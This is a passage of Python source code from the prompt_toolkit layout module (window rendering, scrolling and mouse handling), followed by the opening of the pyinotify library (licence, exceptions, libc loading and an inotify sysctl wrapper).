isinstance(x_offset, int) assert isinstance(y_offset, int) assert isinstance(wrap_lines, bool) self.ui_content = ui_content self.vertical_scroll = vertical_scroll self.window_width = window_width # Width without margins. self.window_height = window_height self.configured_scroll_offsets = configured_scroll_offsets self.visible_line_to_row_col = visible_line_to_row_col self.wrap_lines = wrap_lines self._rowcol_to_yx = rowcol_to_yx # row/col from input to absolute y/x # screen coordinates. self._x_offset = x_offset self._y_offset = y_offset @property def visible_line_to_input_line(self): return dict( (visible_line, rowcol[0]) for visible_line, rowcol in self.visible_line_to_row_col.items()) @property def cursor_position(self): """ Return the cursor position coordinates, relative to the left/top corner of the rendered screen. """ cpos = self.ui_content.cursor_position y, x = self._rowcol_to_yx[cpos.y, cpos.x] return Point(x=x - self._x_offset, y=y - self._y_offset) @property def applied_scroll_offsets(self): """ Return a :class:`.ScrollOffsets` instance that indicates the actual offset. This can be less than or equal to what's configured. E.g, when the cursor is completely at the top, the top offset will be zero rather than what's configured. """ if self.displayed_lines[0] == 0: top = 0 else: # Get row where the cursor is displayed. y = self.input_line_to_visible_line[self.ui_content.cursor_position.y] top = min(y, self.configured_scroll_offsets.top) return ScrollOffsets( top=top, bottom=min(self.ui_content.line_count - self.displayed_lines[-1] - 1, self.configured_scroll_offsets.bottom), # For left/right, it probably doesn't make sense to return something. # (We would have to calculate the widths of all the lines and keep # double width characters in mind.) left=0, right=0) @property def displayed_lines(self): """ List of all the visible rows. (Line numbers of the input buffer.) The last line may not be entirely visible. """ return sorted(row for row, col in self.visible_line_to_row_col.values()) @property def input_line_to_visible_line(self): """ Return the dictionary mapping the line numbers of the input buffer to the lines of the screen. When a line spans several rows at the screen, the first row appears in the dictionary. """ result = {} for k, v in self.visible_line_to_input_line.items(): if v in result: result[v] = min(result[v], k) else: result[v] = k return result def first_visible_line(self, after_scroll_offset=False): """ Return the line number (0 based) of the input document that corresponds with the first visible line. """ if after_scroll_offset: return self.displayed_lines[self.applied_scroll_offsets.top] else: return self.displayed_lines[0] def last_visible_line(self, before_scroll_offset=False): """ Like `first_visible_line`, but for the last visible line. """ if before_scroll_offset: return self.displayed_lines[-1 - self.applied_scroll_offsets.bottom] else: return self.displayed_lines[-1] def center_visible_line(self, before_scroll_offset=False, after_scroll_offset=False): """ Like `first_visible_line`, but for the center visible line. """ return (self.first_visible_line(after_scroll_offset) + (self.last_visible_line(before_scroll_offset) - self.first_visible_line(after_scroll_offset)) // 2 ) @property def content_height(self): """ The full height of the user control. """ return self.ui_content.line_count @property def full_height_visible(self): """ True when the full height is visible (There is no vertical scroll.) """ return self.vertical_scroll == 0 and self.last_visible_line() == self.content_height @property def top_visible(self): """ True when the top of the buffer is visible. """ return self.vertical_scroll == 0 @property def bottom_visible(self): """ True when the bottom of the buffer is visible. """ return self.last_visible_line() == self.content_height - 1 @property def vertical_scroll_percentage(self): """ Vertical scroll as a percentage. (0 means: the top is visible, 100 means: the bottom is visible.) """ if self.bottom_visible: return 100 else: return (100 * self.vertical_scroll // self.content_height) def get_height_for_line(self, lineno): """ Return the height of the given line. (The height that it would take, if this line became visible.) """ if self.wrap_lines: return self.ui_content.get_height_for_line(lineno, self.window_width) else: return 1 class ScrollOffsets(object): """ Scroll offsets for the :class:`.Window` class. Note that left/right offsets only make sense if line wrapping is disabled. """ def __init__(self, top=0, bottom=0, left=0, right=0): assert isinstance(top, Integer) assert isinstance(bottom, Integer) assert isinstance(left, Integer) assert isinstance(right, Integer) self._top = top self._bottom = bottom self._left = left self._right = right @property def top(self): return int(self._top) @property def bottom(self): return int(self._bottom) @property def left(self): return int(self._left) @property def right(self): return int(self._right) def __repr__(self): return 'ScrollOffsets(top=%r, bottom=%r, left=%r, right=%r)' % ( self.top, self.bottom, self.left, self.right) class ColorColumn(object): def __init__(self, position, token=Token.ColorColumn): self.position = position self.token = token _in_insert_mode = ViInsertMode() | EmacsInsertMode() class Window(Container): """ Container that holds a control. :param content: :class:`~prompt_toolkit.layout.controls.UIControl` instance. :param width: :class:`~prompt_toolkit.layout.dimension.LayoutDimension` instance. :param height: :class:`~prompt_toolkit.layout.dimension.LayoutDimension` instance. :param get_width: callable which takes a `CommandLineInterface` and returns a `LayoutDimension`. :param get_height: callable which takes a `CommandLineInterface` and returns a `LayoutDimension`. :param dont_extend_width: When `True`, don't take up more width then the preferred width reported by the control. :param dont_extend_height: When `True`, don't take up more width then the preferred height reported by the control. :param left_margins: A list of :class:`~prompt_toolkit.layout.margins.Margin` instance to be displayed on the left. For instance: :class:`~prompt_toolkit.layout.margins.NumberredMargin` can be one of them in order to show line numbers. :param right_margins: Like `left_margins`, but on the other side. :param scroll_offsets: :class:`.ScrollOffsets` instance, representing the preferred amount of lines/columns to be always visible before/after the cursor. When both top and bottom are a very high number, the cursor will be centered vertically most of the time. :param allow_scroll_beyond_bottom: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, allow scrolling so far, that the top part of the content is not visible anymore, while there is still empty space available at the bottom of the window. In the Vi editor for instance, this is possible. You will see tildes while the top part of the body is hidden. :param wrap_lines: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, don't scroll horizontally, but wrap lines instead. :param get_vertical_scroll: Callable that takes this window instance as input and returns a preferred vertical scroll. (When this is `None`, the scroll is only determined by the last and current cursor position.) :param get_horizontal_scroll: Callable that takes this window instance as input and returns a preferred vertical scroll. :param always_hide_cursor: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, never display the cursor, even when the user control specifies a cursor position. :param cursorline: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, display a cursorline. :param cursorcolumn: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, display a cursorcolumn. :param get_colorcolumns: A callable that takes a `CommandLineInterface` and returns a a list of :class:`.ColorColumn` instances that describe the columns to be highlighted. :param cursorline_token: The token to be used for highlighting the current line, if `cursorline` is True. :param cursorcolumn_token: The token to be used for highlighting the current line, if `cursorcolumn` is True. """ def __init__(self, content, width=None, height=None, get_width=None, get_height=None, dont_extend_width=False, dont_extend_height=False, left_margins=None, right_margins=None, scroll_offsets=None, allow_scroll_beyond_bottom=False, wrap_lines=False, get_vertical_scroll=None, get_horizontal_scroll=None, always_hide_cursor=False, cursorline=False, cursorcolumn=False, get_colorcolumns=None, cursorline_token=Token.CursorLine, cursorcolumn_token=Token.CursorColumn): assert isinstance(content, UIControl) assert width is None or isinstance(width, LayoutDimension) assert height is None or isinstance(height, LayoutDimension) assert get_width is None or callable(get_width) assert get_height is None or callable(get_height) assert width is None or get_width is None assert height is None or get_height is None assert scroll_offsets is None or isinstance(scroll_offsets, ScrollOffsets) assert left_margins is None or all(isinstance(m, Margin) for m in left_margins) assert right_margins is None or all(isinstance(m, Margin) for m in right_margins) assert get_vertical_scroll is None or callable(get_vertical_scroll) assert get_horizontal_scroll is None or callable(get_horizontal_scroll) assert get_colorcolumns is None or callable(get_colorcolumns) self.allow_scroll_beyond_bottom = to_cli_filter(allow_scroll_beyond_bottom) self.always_hide_cursor = to_cli_filter(always_hide_cursor) self.wrap_lines = to_cli_filter(wrap_lines) self.cursorline = to_cli_filter(cursorline) self.cursorcolumn = to_cli_filter(cursorcolumn) self.content = content self.dont_extend_width = dont_extend_width self.dont_extend_height = dont_extend_height self.left_margins = left_margins or [] self.right_margins = right_margins or [] self.scroll_offsets = scroll_offsets or ScrollOffsets() self.get_vertical_scroll = get_vertical_scroll self.get_horizontal_scroll = get_horizontal_scroll self._width = get_width or (lambda cli: width) self._height = get_height or (lambda cli: height) self.get_colorcolumns = get_colorcolumns or (lambda cli: []) self.cursorline_token = cursorline_token self.cursorcolumn_token = cursorcolumn_token # Cache for the screens generated by the margin. self._ui_content_cache = SimpleCache(maxsize=8) self._margin_width_cache = SimpleCache(maxsize=1) self.reset() def __repr__(self): return 'Window(content=%r)' % self.content def reset(self): self.content.reset() #: Scrolling position of the main content. self.vertical_scroll = 0 self.horizontal_scroll = 0 # Vertical scroll 2: this is the vertical offset that a line is # scrolled if a single line (the one that contains the cursor) consumes # all of the vertical space. self.vertical_scroll_2 = 0 #: Keep render information (mappings between buffer input and render #: output.) self.render_info = None def _get_margin_width(self, cli, margin): """ Return the width for this margin. (Calculate only once per render time.) """ # Margin.get_width, needs to have a UIContent instance. def get_ui_content(): return self._get_ui_content(cli, width=0, height=0) def get_width(): return margin.get_width(cli, get_ui_content) key = (margin, cli.render_counter) return self._margin_width_cache.get(key, get_width) def preferred_width(self, cli, max_available_width): # Calculate the width of the margin. total_margin_width = sum(self._get_margin_width(cli, m) for m in self.left_margins + self.right_margins) # Window of the content. (Can be `None`.) preferred_width = self.content.preferred_width( cli, max_available_width - total_margin_width) if preferred_width is not None: # Include width of the margins. preferred_width += total_margin_width # Merge. return self._merge_dimensions( dimension=self._width(cli), preferred=preferred_width, dont_extend=self.dont_extend_width) def preferred_height(self, cli, width, max_available_height): total_margin_width = sum(self._get_margin_width(cli, m) for m in self.left_margins + self.right_margins) wrap_lines = self.wrap_lines(cli) return self._merge_dimensions( dimension=self._height(cli), preferred=self.content.preferred_height( cli, width - total_margin_width, max_available_height, wrap_lines), dont_extend=self.dont_extend_height) @staticmethod def _merge_dimensions(dimension, preferred=None, dont_extend=False): """ Take the LayoutDimension from this `Window` class and the received preferred size from the `UIControl` and return a `LayoutDimension` to report to the parent container. """ dimension = dimension or LayoutDimension() # When a preferred dimension was explicitly given to the Window, # ignore the UIControl. if dimension.preferred_specified: preferred = dimension.preferred # When a 'preferred' dimension is given by the UIControl, make sure # that it stays within the bounds of the Window. if preferred is not None: if dimension.max: preferred = min(preferred, dimension.max) if dimension.min: preferred = max(preferred, dimension.min) # When a `dont_extend` flag has been given, use the preferred dimension # also as the max dimension. if dont_extend and preferred is not None: max_ = min(dimension.max, preferred) else: max_ = dimension.max return LayoutDimension( min=dimension.min, max=max_, preferred=preferred, weight=dimension.weight) def _get_ui_content(self, cli, width, height): """ Create a `UIContent` instance. """ def get_content(): return self.content.create_content(cli, width=width, height=height) key = (cli.render_counter, width, height) return self._ui_content_cache.get(key, get_content) def _get_digraph_char(self, cli): " Return `False`, or the Digraph symbol to be used. " if cli.vi_state.waiting_for_digraph: if cli.vi_state.digraph_symbol1: return cli.vi_state.digraph_symbol1 return '?' return False def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Write window to screen. This renders the user control, the margins and copies everything over to the absolute position at the given screen. """ # Calculate margin sizes. left_margin_widths = [self._get_margin_width(cli, m) for m in self.left_margins] right_margin_widths = [self._get_margin_width(cli, m) for m in self.right_margins] total_margin_width = sum(left_margin_widths + right_margin_widths) # Render UserControl. ui_content = self.content.create_content( cli, write_position.width - total_margin_width, write_position.height) assert isinstance(ui_content, UIContent) # Scroll content. wrap_lines = self.wrap_lines(cli) scroll_func = self._scroll_when_linewrapping if wrap_lines else self._scroll_without_linewrapping scroll_func( ui_content, write_position.width - total_margin_width, write_position.height, cli) # Write body visible_line_to_row_col, rowcol_to_yx = self._copy_body( cli, ui_content, screen, write_position, sum(left_margin_widths), write_position.width - total_margin_width, self.vertical_scroll, self.horizontal_scroll, has_focus=self.content.has_focus(cli), wrap_lines=wrap_lines, highlight_lines=True, vertical_scroll_2=self.vertical_scroll_2, always_hide_cursor=self.always_hide_cursor(cli)) # Remember render info. (Set before generating the margins. They need this.) x_offset=write_position.xpos + sum(left_margin_widths) y_offset=write_position.ypos self.render_info = WindowRenderInfo( ui_content=ui_content, horizontal_scroll=self.horizontal_scroll, vertical_scroll=self.vertical_scroll, window_width=write_position.width - total_margin_width, window_height=write_position.height, configured_scroll_offsets=self.scroll_offsets, visible_line_to_row_col=visible_line_to_row_col, rowcol_to_yx=rowcol_to_yx, x_offset=x_offset, y_offset=y_offset, wrap_lines=wrap_lines) # Set mouse handlers. def mouse_handler(cli, mouse_event): """ Wrapper around the mouse_handler of the `UIControl` that turns screen coordinates into line coordinates. """ # Find row/col position first. yx_to_rowcol = dict((v, k) for k, v in rowcol_to_yx.items()) y = mouse_event.position.y x = mouse_event.position.x # If clicked below the content area, look for a position in the # last line instead. max_y = write_position.ypos + len(visible_line_to_row_col) - 1 y = min(max_y, y) while x >= 0: try: row, col = yx_to_rowcol[y, x] except KeyError: # Try again. (When clicking on the right side of double # width characters, or on the right side of the input.) x -= 1 else: # Found position, call handler of UIControl. result = self.content.mouse_handler( cli, MouseEvent(position=Point(x=col, y=row), event_type=mouse_event.event_type)) break else: # nobreak. # (No x/y coordinate found for the content. This happens in # case of a FillControl, that only specifies a background, but # doesn't have a content. Report (0,0) instead.) result = self.content.mouse_handler( cli, MouseEvent(position=Point(x=0, y=0), event_type=mouse_event.event_type)) # If it returns NotImplemented, handle it here. if result == NotImplemented: return self._mouse_handler(cli, mouse_event) return result mouse_handlers.set_mouse_handler_for_range( x_min=write_position.xpos + sum(left_margin_widths), x_max=write_position.xpos + write_position.width - total_margin_width, y_min=write_position.ypos, y_max=write_position.ypos + write_position.height, handler=mouse_handler) # Render and copy margins. move_x = 0 def render_margin(m, width): " Render margin. Return `Screen`. " # Retrieve margin tokens. tokens = m.create_margin(cli, self.render_info, width, write_position.height) # Turn it into a UIContent object. # already rendered those tokens using this size.) return TokenListControl.static(tokens).create_content( cli, width + 1, write_position.height) for m, width in zip(self.left_margins, left_margin_widths): # Create screen for margin. margin_screen = render_margin(m, width) # Copy and shift X. self._copy_margin(cli, margin_screen, screen, write_position, move_x, width) move_x += width move_x = write_position.width - sum(right_margin_widths) for m, width in zip(self.right_margins, right_margin_widths): # Create screen for margin. margin_screen = render_margin(m, width) # Copy and shift X. self._copy_margin(cli, margin_screen, screen, write_position, move_x, width) move_x += width def _copy_body(self, cli, ui_content, new_screen, write_position, move_x, width, vertical_scroll=0, horizontal_scroll=0, has_focus=False, wrap_lines=False, highlight_lines=False, vertical_scroll_2=0, always_hide_cursor=False): """ Copy the UIContent into the output screen. """ xpos = write_position.xpos + move_x ypos = write_position.ypos line_count = ui_content.line_count new_buffer = new_screen.data_buffer empty_char = _CHAR_CACHE['', Token] ZeroWidthEscape = Token.ZeroWidthEscape # Map visible line number to (row, col) of input. # 'col' will always be zero if line wrapping is off. visible_line_to_row_col = {} rowcol_to_yx = {} # Maps (row, col) from the input to (y, x) screen coordinates. # Fill background with default_char first. default_char = ui_content.default_char if default_char: for y in range(ypos, ypos + write_position.height): new_buffer_row = new_buffer[y] for x in range(xpos, xpos + width): new_buffer_row[x] = default_char # Copy content. def copy(): y = - vertical_scroll_2 lineno = vertical_scroll while y < write_position.height and lineno < line_count: # Take the next line and copy it in the real screen. line = ui_content.get_line(lineno) col = 0 x = -horizontal_scroll visible_line_to_row_col[y] = (lineno, horizontal_scroll) new_buffer_row = new_buffer[y + ypos] for token, text in line: # Remember raw VT escape sequences. (E.g. FinalTerm's # escape sequences.) if token == ZeroWidthEscape: new_screen.zero_width_escapes[y + ypos][x + xpos] += text continue for c in text: char = _CHAR_CACHE[c, token] char_width = char.width # Wrap when the line width is exceeded. if wrap_lines and x + char_width > width: visible_line_to_row_col[y + 1] = ( lineno, visible_line_to_row_col[y][1] + x) y += 1 x = -horizontal_scroll # This would be equal to zero. # (horizontal_scroll=0 when wrap_lines.) new_buffer_row = new_buffer[y + ypos] if y >= write_position.height: return y # Break out of all for loops. # Set character in screen and shift 'x'. if x >= 0 and y >= 0 and x < write_position.width: new_buffer_row[x + xpos] = char # When we print a multi width character, make sure # to erase the neighbous positions in the screen. # (The empty string if different from everything, # so next redraw this cell will repaint anyway.) if char_width > 1: for i in range(1, char_width): new_buffer_row[x + xpos + i] = empty_char # If this is a zero width characters, then it's # probably part of a decomposed unicode character. # See: https://en.wikipedia.org/wiki/Unicode_equivalence # Merge it in the previous cell. elif char_width == 0 and x - 1 >= 0: prev_char = new_buffer_row[x + xpos - 1] char2 = _CHAR_CACHE[prev_char.char + c, prev_char.token] new_buffer_row[x + xpos - 1] = char2 # Keep track of write position for each character. rowcol_to_yx[lineno, col] = (y + ypos, x + xpos) col += 1 x += char_width lineno += 1 y += 1 return y y = copy() def cursor_pos_to_screen_pos(row, col): " Translate row/col from UIContent to real Screen coordinates. " try: y, x = rowcol_to_yx[row, col] except KeyError: # Normally this should never happen. (It is a bug, if it happens.) # But to be sure, return (0, 0) return Point(y=0, x=0) # raise ValueError( # 'Invalid position. row=%r col=%r, vertical_scroll=%r, ' # 'horizontal_scroll=%r, height=%r' % # (row, col, vertical_scroll, horizontal_scroll, write_position.height)) else: return Point(y=y, x=x) # Set cursor and menu positions. if ui_content.cursor_position: screen_cursor_position = cursor_pos_to_screen_pos( ui_content.cursor_position.y, ui_content.cursor_position.x) if has_focus: new_screen.cursor_position = screen_cursor_position if always_hide_cursor: new_screen.show_cursor = False else: new_screen.show_cursor = ui_content.show_cursor self._highlight_digraph(cli, new_screen) if highlight_lines: self._highlight_cursorlines( cli, new_screen, screen_cursor_position, xpos, ypos, width, write_position.height) # Draw input characters from the input processor queue. if has_focus and ui_content.cursor_position: self._show_input_processor_key_buffer(cli, new_screen) # Set menu position. if not new_screen.menu_position and ui_content.menu_position: new_screen.menu_position = cursor_pos_to_screen_pos( ui_content.menu_position.y, ui_content.menu_position.x) # Update output screne height. new_screen.height = max(new_screen.height, ypos + write_position.height) return visible_line_to_row_col, rowcol_to_yx def _highlight_digraph(self, cli, new_screen): """ When we are in Vi digraph mode, put a question mark underneath the cursor. """ digraph_char = self._get_digraph_char(cli) if digraph_char: cpos = new_screen.cursor_position new_screen.data_buffer[cpos.y][cpos.x] = \ _CHAR_CACHE[digraph_char, Token.Digraph] def _show_input_processor_key_buffer(self, cli, new_screen): """ When the user is typing a key binding that consists of several keys, display the last pressed key if the user is in insert mode and the key is meaningful to be displayed. E.g. Some people want to bind 'jj' to escape in Vi insert mode. But the first 'j' needs to be displayed in order to get some feedback. """ key_buffer = cli.input_processor.key_buffer if key_buffer and _in_insert_mode(cli) and not cli.is_done: # The textual data for the given key. (Can be a VT100 escape # sequence.) data = key_buffer[-1].data # Display only if this is a 1 cell width character. if get_cwidth(data) == 1: cpos = new_screen.cursor_position new_screen.data_buffer[cpos.y][cpos.x] = \ _CHAR_CACHE[data, Token.PartialKeyBinding] def _highlight_cursorlines(self, cli, new_screen, cpos, x, y, width, height): """ Highlight cursor row/column. """ cursor_line_token = (':', ) + self.cursorline_token cursor_column_token = (':', ) + self.cursorcolumn_token data_buffer = new_screen.data_buffer # Highlight cursor line. if self.cursorline(cli): row = data_buffer[cpos.y] for x in range(x, x + width): original_char = row[x] row[x] = _CHAR_CACHE[ original_char.char, original_char.token + cursor_line_token] # Highlight cursor column. if self.cursorcolumn(cli): for y2 in range(y, y + height): row = data_buffer[y2] original_char = row[cpos.x] row[cpos.x] = _CHAR_CACHE[ original_char.char, original_char.token + cursor_column_token] # Highlight color columns for cc in self.get_colorcolumns(cli): assert isinstance(cc, ColorColumn) color_column_token = (':', ) + cc.token column = cc.position for y2 in range(y, y + height): row = data_buffer[y2] original_char = row[column] row[column] = _CHAR_CACHE[ original_char.char, original_char.token + color_column_token] def _copy_margin(self, cli, lazy_screen, new_screen, write_position, move_x, width): """ Copy characters from the margin screen to the real screen. """ xpos = write_position.xpos + move_x ypos = write_position.ypos margin_write_position = WritePosition(xpos, ypos, width, write_position.height) self._copy_body(cli, lazy_screen, new_screen, margin_write_position, 0, width) def _scroll_when_linewrapping(self, ui_content, width, height, cli): """ Scroll to make sure the cursor position is visible and that we maintain the requested scroll offset. Set `self.horizontal_scroll/vertical_scroll`. """ scroll_offsets_bottom = self.scroll_offsets.bottom scroll_offsets_top = self.scroll_offsets.top # We don't have horizontal scrolling. self.horizontal_scroll = 0 # If the current line consumes more than the whole window height, # then we have to scroll vertically inside this line. (We don't take # the scroll offsets into account for this.) # Also, ignore the scroll offsets in this case. Just set the vertical # scroll to this line. if ui_content.get_height_for_line(ui_content.cursor_position.y, width) > height - scroll_offsets_top: # Calculate the height of the text before the cursor, with the line # containing the cursor included, and the character belowe the # cursor included as well. line = explode_tokens(ui_content.get_line(ui_content.cursor_position.y)) text_before_cursor = token_list_to_text(line[:ui_content.cursor_position.x + 1]) text_before_height = UIContent.get_height_for_text(text_before_cursor, width) # Adjust scroll offset. self.vertical_scroll = ui_content.cursor_position.y self.vertical_scroll_2 = min(text_before_height - 1, self.vertical_scroll_2) self.vertical_scroll_2 = max(0, text_before_height - height, self.vertical_scroll_2) return else: self.vertical_scroll_2 = 0 # Current line doesn't consume the whole height. Take scroll offsets into account. def get_min_vertical_scroll(): # Make sure that the cursor line is not below the bottom. # (Calculate how many lines can be shown between the cursor and the .) used_height = 0 prev_lineno = ui_content.cursor_position.y for lineno in range(ui_content.cursor_position.y, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > height - scroll_offsets_bottom: return prev_lineno else: prev_lineno = lineno return 0 def get_max_vertical_scroll(): # Make sure that the cursor line is not above the top. prev_lineno = ui_content.cursor_position.y used_height = 0 for lineno in range(ui_content.cursor_position.y - 1, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > scroll_offsets_top: return prev_lineno else: prev_lineno = lineno return prev_lineno def get_topmost_visible(): """ Calculate the upper most line that can be visible, while the bottom is still visible. We should not allow scroll more than this if `allow_scroll_beyond_bottom` is false. """ prev_lineno = ui_content.line_count - 1 used_height = 0 for lineno in range(ui_content.line_count - 1, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > height: return prev_lineno else: prev_lineno = lineno return prev_lineno # Scroll vertically. (Make sure that the whole line which contains the # cursor is visible. topmost_visible = get_topmost_visible() # Note: the `min(topmost_visible, ...)` is to make sure that we # don't require scrolling up because of the bottom scroll offset, # when we are at the end of the document. self.vertical_scroll = max(self.vertical_scroll, min(topmost_visible, get_min_vertical_scroll())) self.vertical_scroll = min(self.vertical_scroll, get_max_vertical_scroll()) # Disallow scrolling beyond bottom? if not self.allow_scroll_beyond_bottom(cli): self.vertical_scroll = min(self.vertical_scroll, topmost_visible) def _scroll_without_linewrapping(self, ui_content, width, height, cli): """ Scroll to make sure the cursor position is visible and that we maintain the requested scroll offset. Set `self.horizontal_scroll/vertical_scroll`. """ cursor_position = ui_content.cursor_position or Point(0, 0) # Without line wrapping, we will never have to scroll vertically inside # a single line. self.vertical_scroll_2 = 0 if ui_content.line_count == 0: self.vertical_scroll = 0 self.horizontal_scroll = 0 return else: current_line_text = token_list_to_text(ui_content.get_line(cursor_position.y)) def do_scroll(current_scroll, scroll_offset_start, scroll_offset_end, cursor_pos, window_size, content_size): " Scrolling algorithm. Used for both horizontal and vertical scrolling. " # Calculate the scroll offset to apply. # This can obviously never be more than have the screen size. Also, when the # cursor appears at the top or bottom, we don't apply the offset. scroll_offset_start = int(min(scroll_offset_start, window_size / 2, cursor_pos)) scroll_offset_end = int(min(scroll_offset_end, window_size / 2, content_size - 1 - cursor_pos)) # Prevent negative scroll offsets. if current_scroll < 0: current_scroll = 0 # Scroll back if we scrolled to much and there's still space to show more of the document. if (not self.allow_scroll_beyond_bottom(cli) and current_scroll > content_size - window_size): current_scroll = max(0, content_size - window_size) # Scroll up if cursor is before visible part. if current_scroll > cursor_pos - scroll_offset_start: current_scroll = max(0, cursor_pos - scroll_offset_start) # Scroll down if cursor is after visible part. if current_scroll < (cursor_pos + 1) - window_size + scroll_offset_end: current_scroll = (cursor_pos + 1) - window_size + scroll_offset_end return current_scroll # When a preferred scroll is given, take that first into account. if self.get_vertical_scroll: self.vertical_scroll = self.get_vertical_scroll(self) assert isinstance(self.vertical_scroll, int) if self.get_horizontal_scroll: self.horizontal_scroll = self.get_horizontal_scroll(self) assert isinstance(self.horizontal_scroll, int) # Update horizontal/vertical scroll to make sure that the cursor # remains visible. offsets = self.scroll_offsets self.vertical_scroll = do_scroll( current_scroll=self.vertical_scroll, scroll_offset_start=offsets.top, scroll_offset_end=offsets.bottom, cursor_pos=ui_content.cursor_position.y, window_size=height, content_size=ui_content.line_count) self.horizontal_scroll = do_scroll( current_scroll=self.horizontal_scroll, scroll_offset_start=offsets.left, scroll_offset_end=offsets.right, cursor_pos=get_cwidth(current_line_text[:ui_content.cursor_position.x]), window_size=width, # We can only analyse the current line. Calculating the width off # all the lines is too expensive. content_size=max(get_cwidth(current_line_text), self.horizontal_scroll + width)) def _mouse_handler(self, cli, mouse_event): """ Mouse handler. Called when the UI control doesn't handle this particular event. """ if mouse_event.event_type == MouseEventType.SCROLL_DOWN: self._scroll_down(cli) elif mouse_event.event_type == MouseEventType.SCROLL_UP: self._scroll_up(cli) def _scroll_down(self, cli): " Scroll window down. " info = self.render_info if self.vertical_scroll < info.content_height - info.window_height: if info.cursor_position.y <= info.configured_scroll_offsets.top: self.content.move_cursor_down(cli) self.vertical_scroll += 1 def _scroll_up(self, cli): " Scroll window up. " info = self.render_info if info.vertical_scroll > 0: # TODO: not entirely correct yet in case of line wrapping and long lines. if info.cursor_position.y >= info.window_height - 1 - info.configured_scroll_offsets.bottom: self.content.move_cursor_up(cli) self.vertical_scroll -= 1 def walk(self, cli): # Only yield self. A window doesn't have children. yield self class ConditionalContainer(Container): """ Wrapper around any other container that can change the visibility. The received `filter` determines whether the given container should be displayed or not. :param content: :class:`.Container` instance. :param filter: :class:`~prompt_toolkit.filters.CLIFilter` instance. """ def __init__(self, content, filter): assert isinstance(content, Container) self.content = content self.filter = to_cli_filter(filter) def __repr__(self): return 'ConditionalContainer(%r, filter=%r)' % (self.content, self.filter) def reset(self): self.content.reset() def preferred_width(self, cli, max_available_width): if self.filter(cli): return self.content.preferred_width(cli, max_available_width) else: return LayoutDimension.exact(0) def preferred_height(self, cli, width, max_available_height): if self.filter(cli): return self.content.preferred_height(cli, width, max_available_height) else: return LayoutDimension.exact(0) def write_to_screen(self, cli, screen, mouse_handlers, write_position): if self.filter(cli): return self.content.write_to_screen(cli, screen, mouse_handlers, write_position) def walk(self, cli): return self.content.walk(cli) # Deprecated alias for 'Container'. Layout = Container
#!/usr/bin/env python # pyinotify.py - python interface to inotify # Copyright (c) 2010 Sebastien Martini <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ pyinotify @author: Sebastien Martini @license: MIT License @contact: [email protected] """ class PyinotifyError(Exception): """Indicates exceptions raised by a Pyinotify class.""" pass class UnsupportedPythonVersionError(PyinotifyError): """ Raised on unsupported Python versions. """ def __init__(self, version): """ @param version: Current Python version @type version: string """ PyinotifyError.__init__(self, ('Python %s is unsupported, requires ' 'at least Python 3.0') % version) class UnsupportedLibcVersionError(PyinotifyError): """ Raised when libc couldn't be loaded or when inotify functions werent provided. """ def __init__(self): err = 'libc does not provide required inotify support' PyinotifyError.__init__(self, err) # Check Python version import sys if sys.version < '3.0': raise UnsupportedPythonVersionError(sys.version) # Import directives import threading import os import select import struct import fcntl import errno import termios import array import logging import atexit from collections import deque from datetime import datetime, timedelta import time import fnmatch import re import ctypes import ctypes.util import asyncore import glob try: from functools import reduce except ImportError: pass # Will fail on Python 2.4 which has reduce() builtin anyway. __author__ = "[email protected] (Sebastien Martini)" __version__ = "0.9.0" # Compatibity mode: set to True to improve compatibility with # Pyinotify 0.7.1. Do not set this variable yourself, call the # function compatibility_mode() instead. COMPATIBILITY_MODE = False # Load libc LIBC = None def strerrno(): code = ctypes.get_errno() return '%s (%s)' % (os.strerror(code), errno.errorcode[code]) def load_libc(): global LIBC libc = None try: libc = ctypes.util.find_library('c') except OSError as err: pass # Will attemp to load it with None anyway. except IOError as err: pass LIBC = ctypes.CDLL(libc, use_errno=True) # Check that libc has needed functions inside. if (not hasattr(LIBC, 'inotify_init') or not hasattr(LIBC, 'inotify_add_watch') or not hasattr(LIBC, 'inotify_rm_watch')): raise UnsupportedLibcVersionError() load_libc() class PyinotifyLogger(logging.Logger): """ Pyinotify logger used for logging unicode strings. """ def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None): rv = UnicodeLogRecord(name, level, fn, lno, msg, args, exc_info, func) if extra is not None: for key in extra: if (key in ["message", "asctime"]) or (key in rv.__dict__): raise KeyError("Attempt to overwrite %r in LogRecord" % key) rv.__dict__[key] = extra[key] return rv # Logging def logger_init(): """Initialize logger instance.""" log = logging.getLogger("pyinotify") console_handler = logging.StreamHandler() console_handler.setFormatter( logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s")) log.addHandler(console_handler) log.setLevel(20) return log log = logger_init() # inotify's variables class SysCtlINotify: """ Access (read, write) inotify's variables through sysctl. Usually it requires administrator rights to update them. Examples: - Read max_queued_events attribute: myvar = max_queued_events.value - Update max_queued_events attribute: max_queued_events.value = 42 """ inotify_attrs = {'max_user_instances': 1, 'max_user_watches': 2, 'max_queued_events': 3} def __init__(self, attrname): sino = ctypes.c_int * 3 self._attrname = attrname self._attr = sino(5, 20, SysCtlINotify.inotify_attrs[attrname]) def get_val(self): """ Gets attribute's value. 